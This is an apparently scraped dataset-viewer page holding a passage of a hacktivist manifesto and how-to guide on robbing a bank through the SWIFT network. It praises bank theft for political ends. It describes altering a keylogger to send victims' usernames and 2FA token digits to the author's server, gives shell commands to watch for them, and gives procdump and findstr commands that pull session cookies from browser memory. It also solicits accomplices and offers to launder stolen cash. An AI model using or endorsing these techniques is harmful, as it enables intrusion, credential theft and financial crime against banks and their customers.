text stringlengths 0 1.99k |
|---|
According to Barack Obama, economic inequality is "the challenge that defines our time." Computer hacking is a powerful tool to combat economic inequality. The former director of the NSA, Keith Alexander, agrees and says that hacking is responsible for "the greatest transfer of wealth in history." |
********* |
______________________________ |
/ The story is ours \ |
\ and it is done by hackers! / |
---------------------------- |
\ |
\ ^__^ |
(oo)\_______ |
( (__)\ )\/\ |
_) / ||----w | |
(.)/ || || |
`' |
Everyone together, now and forever! |
********* |
[1] https://sursiendo.com/docs/Pensar_desde_los_comunes_web.pdf |
[2] https://chomsky.info/commongood02/ |
[3] The Will to Change: Men, Masculinity, and Love |
[4] their own religion is very clear about this: https://dailyverses.net/es/materialismo |
[5] https://elpulso.hn/la-filantropia-en-los-tiempos-del-capitalismo/ |
[6] http://www.hamptoninstitution.org/expropriation-or-bust.html |
[7] Manifiesto por una Civilización Democrática. Volumen 1, Civilización: La Era de los Dioses Enmascarados y los Reyes Cubiertos |
[8] Calibán y la Bruja |
[9] En deuda: Una historia alternativa de la economía |
[10] La otra historia de los Estados Unidos |
[11] Las venas abiertas de América Latina |
******** |
_______________________________ |
< Our weapons are our keyboards > |
-------------------------------- |
\ |
\ ^__^ |
(oo)\_______ |
( (__)\ )\/\ |
_) / ||----w | |
(.)/ || || |
`' ^^ ^^ |
******** |
[2 - Introduction] |
This guide explains how I hacked the Cayman Bank and Trust Company (Isle of Man). Why am I publishing this, almost four years later? |
1) To show what is possible |
Hackers working for social change have limited themselves to developing security and privacy tools, DDoS, performing vandalism and leaks. Wherever you go, there are radical projects for a social change in a complete state of precariousness, and there would be much that they could do with some expropriated money. At least for the working class, bank robbery is something socially accepted, and those who do are seen as heroes of the people. In the digital age, robbing a bank is a non-violent, less risky act, and the reward is greater than ever. So why are only black hat hackers doing it for their personal benefit, and never hacktivists to finance radical projects? Maybe they don't think they are capable of doing it. The big bank hacks are on the news every so often, such as the hacking of the Bank of Bangladesh [1], which was attributed to North Korea, or the hacking of banks attributed to the Carbanak group [2], which they describe as a very large and well organized group of Russian hackers, with different members who would be specialized in different tasks. But, it is not that complicated. |
It is because of our collective belief that the financial system is unquestionable that we exercise control over ourselves, and maintain the class system without those above having to do anything [3]. Being able to see how vulnerable and fragile the financial system really is helps us break that collective hallucination. That is why banks have a strong incentive not to report hacks, and to exaggerate how sophisticated the attackers are. None of the financial hacks I made, or those I've known, have ever been reported. This is going to be the first, and not because the bank wanted to, but because I decided to publish it. |
As you are about to learn in this home guide, hacking a bank and transferring money through the SWIFT network does not require the support of any government or a large and specialized group. It is something totally possible being a mere amateur hacker, with only public tools and basic knowledge of how to write a script. |
[1] https://elpais.com/economia/2016/03/17/actualidad/1458200294_374693.html |
[2] https://securelist.lat/el-gran-robo-de-banco-el-apt-carbanak/67508/ |
[3] https://es.wikipedia.org/wiki/Hegemon%C3%ADa_cultural |
2) Help withdraw cash |
Many of those who read this already have, or with a little study will be able to acquire, the skills needed to carry out a hack like this. However, many will find that they lack the necessary criminal connections to get the handles in condition. In my case, this was the first bank that hacked, and at that time I only had a few and mediocre accounts ready to withdraw the cash (known as bank drops), so it was only a few hundred thousand that I could withdraw at total, when it is normal to get millions. Now, on the other hand, I do have the knowledge and connections to get cash more seriously, so if you are hacking a bank but need help to convert that into real money, and you want to use that money to finance radical social projects, you can contact me. |
3) Collaborate |
It is possible to hack banks as an amateur who works alone, but the net is that, in general, it is not as easy as I paint it here. I was lucky with this bank for several reasons: |
1. It was a small bank, so it took me much less time to understand how everything worked. |
2. They had no procedure to check the sent swift messages. Many banks have one, and you need to write code to hide your transfers from their monitoring system. |
3. They only used password authentication to access the application with which they connected to the SWIFT network. Most banks now use RSA SecurID, or some form of 2FA. You can skip this by typing code to get an alert when your token enters, so you can use it before it expires. It's simpler than it seems: I used Get-Keystrokes [1], modifying it so that instead of storing the pressed keys, a GET request is made to my server every time it is detected that they have entered a username. This request adds the username to the url and, as they type the token, several GETs are made with the token digits concatenated to the url. On my side I leave this running in the meantime: |
``` |
ssh me@my_secret_server 'tail -f /var/log/apache2/access_log' |
| while read i; do echo $i; aplay alarma.wav &> /dev/null; done |
``` |
If it is a web application, you can skip the 2FA by stealing the cookie after they have authenticated. I am not an APT with a team of coders who can make me customized tools. I am a simple person who subsists on what the terminal gives [2], so what I use is: |
``` |
procdump64 /accepteula -r -ma PID_of_browser |
strings64 /accepteula * .dmp | findstr PHPSESSID 2> nul |
``` |
or going through findstr rather than strings, which makes it much faster: |
``` |
findstr PHPSESSID * .dmp> tmp |
strings64 /accepteula tmp | findstr PHPSESSID 2> nul |
``` |
Another way to skip it is to access your session with a hidden VNC (hvnc) after they have authenticated, or with a little creativity you could also focus on another part of their process instead of sending SWIFT messages directly. |
I think that if I collaborated with other experienced bank hackers we could hack hundreds of banks like Carnabak, instead of doing one from time to time on my own. So if you have experience with similar hacks and want to collaborate, contact me. You will find my email and my PGP key at the end of the previous guide [3]. |
[1] https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-Keystrokes.ps1 |
[2] https://lolbas-project.github.io/ |
[3] https://www.exploit-db.com/papers/41914 |
******* |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.